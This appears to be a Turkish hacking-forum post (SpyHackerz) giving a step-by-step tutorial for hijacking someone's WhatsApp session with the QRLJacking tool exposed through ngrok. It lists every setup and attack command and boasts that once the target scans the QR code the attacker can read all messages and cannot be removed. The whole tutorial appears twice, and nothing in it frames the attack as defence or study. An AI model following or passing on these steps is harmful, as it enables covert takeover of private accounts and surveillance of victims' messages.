Anlatıma geçelim;
masaüstüne geliyoruz
cd Desktop
kullanacağımız toolu indiriyoruz
git clone https://github.com/OWASP/QRLJacking
geckodriver'a ihtiyacımız var https://github.com/mozilla/geckodriver/releases bu adrese gidip linux sürümünüze uygun olanı indirin
zip dosyasını çıkartın ve driveri gereken dizinlere kopyalayın
sudo cp geckodriver /usr/local/share/
sudo cp geckodriver /usr/local/bin/
sudo cp geckodriver /usr/bin/
şimdi terminali kapatabilirsiniz.
aracı dış ağda kullanmak için ngrok'a ihtiyacımız var sitesine girin kayıt olun ve indirin https://ngrok.com/
ardından zipten çıkartın ve
sudo mv ngrok /root
dizinine atıp root dizinine giriş yapıp yetki verin
chmod +x ngrok
son olarak
cp ngrok /usr/bin/
buraya kopyalayıp işlemi bitiriyoruz
kayıt olduğunuzda size bir key verdi o keyi tanıtmak için
./ngrok authtoken tokeni yazın
masaüstüne geliyoruz
cd QRLJacking/
gerekli pyhton modüllerini yüklüyoruz
pip3 install -r requirements.txt
pip3 yüklü değil ise şu komutu girin sudo apt-get install python3-pip
toolu çalıştırıyoruz
python3 QrlJacker.py
help yazarak komutları görebilirsiniz
exploiti çalıştıralım
use grabber/whatsapp
options komutunu girerek ayarlara girelim
portu ve hostu ayarlayacağız
set port 1337
set host 0.0.0.0
not: firewall kuruluysa 1337 portuna izin verin
başka bir terminal açıp portu dinlemeye alıyoruz
ngrok http 1337
QRLJacker'ın olduğu terminale gelerek
run
komutunu verdiğinizde qr kod oluşacak
ngrok'u dinlemeye aldığınız terminale gelin forward url'nin karşısındaki urlyi açın
bu kodu hedef telefona okutacaksınız
bu kodu okuttuktan sonra whatsapp kontrolü tamamen sizde olacak karşı tarafın. fark etse bile sizi atamayacak.
kodu okuttuktan sonra
sessions -i 0
kodunu girerek tarayıcıda açılan sekmeyle tüm mesajları görebilir hedefin whatsapp'ında her şeyi yapabilirsiniz.
View hidden content is available for registered users!
View hidden content is available for registered users!
masaüstüne geliyoruz
cd Desktop
kullanacağımız toolu indiriyoruz
git clone https://github.com/OWASP/QRLJacking
geckodriver'a ihtiyacımız var https://github.com/mozilla/geckodriver/releases bu adrese gidip linux sürümünüze uygun olanı indirin
zip dosyasını çıkartın ve driveri gereken dizinlere kopyalayın
sudo cp geckodriver /usr/local/share/
sudo cp geckodriver /usr/local/bin/
sudo cp geckodriver /usr/bin/
şimdi terminali kapatabilirsiniz.
aracı dış ağda kullanmak için ngrok'a ihtiyacımız var sitesine girin kayıt olun ve indirin https://ngrok.com/
ardından zipten çıkartın ve
sudo mv ngrok /root
dizinine atıp root dizinine giriş yapıp yetki verin
chmod +x ngrok
son olarak
cp ngrok /usr/bin/
buraya kopyalayıp işlemi bitiriyoruz
kayıt olduğunuzda size bir key verdi o keyi tanıtmak için
./ngrok authtoken tokeni yazın
masaüstüne geliyoruz
cd QRLJacking/
gerekli pyhton modüllerini yüklüyoruz
pip3 install -r requirements.txt
pip3 yüklü değil ise şu komutu girin sudo apt-get install python3-pip
toolu çalıştırıyoruz
python3 QrlJacker.py
help yazarak komutları görebilirsiniz
exploiti çalıştıralım
use grabber/whatsapp
options komutunu girerek ayarlara girelim
portu ve hostu ayarlayacağız
set port 1337
set host 0.0.0.0
not: firewall kuruluysa 1337 portuna izin verin
başka bir terminal açıp portu dinlemeye alıyoruz
ngrok http 1337
QRLJacker'ın olduğu terminale gelerek
run
komutunu verdiğinizde qr kod oluşacak
ngrok'u dinlemeye aldığınız terminale gelin forward url'nin karşısındaki urlyi açın
bu kodu hedef telefona okutacaksınız
bu kodu okuttuktan sonra whatsapp kontrolü tamamen sizde olacak karşı tarafın. fark etse bile sizi atamayacak.
kodu okuttuktan sonra
sessions -i 0
kodunu girerek tarayıcıda açılan sekmeyle tüm mesajları görebilir hedefin whatsapp'ında her şeyi yapabilirsiniz.
View hidden content is available for registered users!
View hidden content is available for registered users!
Moderatörün son düzenlenenleri:
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
